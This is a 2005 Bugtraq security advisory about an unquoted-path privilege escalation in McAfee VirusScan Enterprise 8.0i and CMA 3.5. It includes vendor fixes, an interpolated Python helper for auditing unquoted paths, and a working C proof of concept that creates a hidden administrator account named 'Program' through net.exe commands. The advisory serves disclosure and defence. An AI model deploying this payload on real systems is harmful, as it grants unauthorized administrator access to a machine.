Network Security Bugtraq

Subject: Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Date: Thu, 22 Dec 2005 10:16:09 -0700
( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA 3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because the path is not quoted, the naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run C:\Program
Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named Program.exe, place it in the
root of C:\, and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
below.
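Added example, not part of the advisory: a small Python audit helper that reproduces the resolution order described above for an unquoted command line, so an administrator can list the locations the loader would try ahead of the intended binary and check them against a file inventory or an ACL review of the parent directories. It assumes the command line holds only the executable path (no trailing arguments); the `exists` callable is an assumption used so the check runs against a collected inventory as well as the live filesystem.

```python
import ntpath
import os

# Sample unquoted command line, taken from the advisory text.
ADVISORY_CMD = r"C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE"


def unquoted_path_candidates(command_line):
    """Executable paths the Windows loader tries, in order, for a command
    line handed to CreateProcess without quotes.

    Each space-delimited prefix is tried as the module name; a prefix with
    no extension gets ".exe" appended. The loader stops at the first
    candidate that exists, so every entry before the intended one is a
    location where an unexpected file would be executed instead.
    """
    command_line = command_line.strip()
    if command_line.startswith('"'):
        # A properly quoted path is resolved exactly as written.
        end = command_line.find('"', 1)
        return [command_line[1:end]] if end > 0 else []
    tokens = command_line.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def resolved_executable(command_line, exists=os.path.exists):
    """Path the loader would actually run: the first candidate that exists.

    `exists` defaults to the live filesystem; an audit script can instead
    pass a callable over a file inventory collected from the host.
    """
    for candidate in unquoted_path_candidates(command_line):
        if exists(candidate):
            return candidate
    return None


def audit_command_line(command_line, exists=os.path.exists):
    """Return (intended_path, shadowing_paths_that_exist).

    Assumes the command line is a bare path, so the last candidate is
    the binary the product intends to launch.
    """
    candidates = unquoted_path_candidates(command_line)
    intended = candidates[-1] if candidates else None
    shadowing = [c for c in candidates[:-1] if exists(c)]
    return intended, shadowing
```

Feeding the ImagePath values of installed services or the command lines of scheduled tasks through `audit_command_line` turns the advisory's observation into a repeatable host check.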

Vulnerable Versions:
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
#include <windows.h>
#include <stdlib.h>   /* system(), _MAX_PATH */
#include <stdio.h>

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    /* Locate the Windows directory so net.exe is invoked by full path. */
    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    /* When launched as C:\Program.exe by naPrdMgr.exe this runs as Local System. */
    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/ )
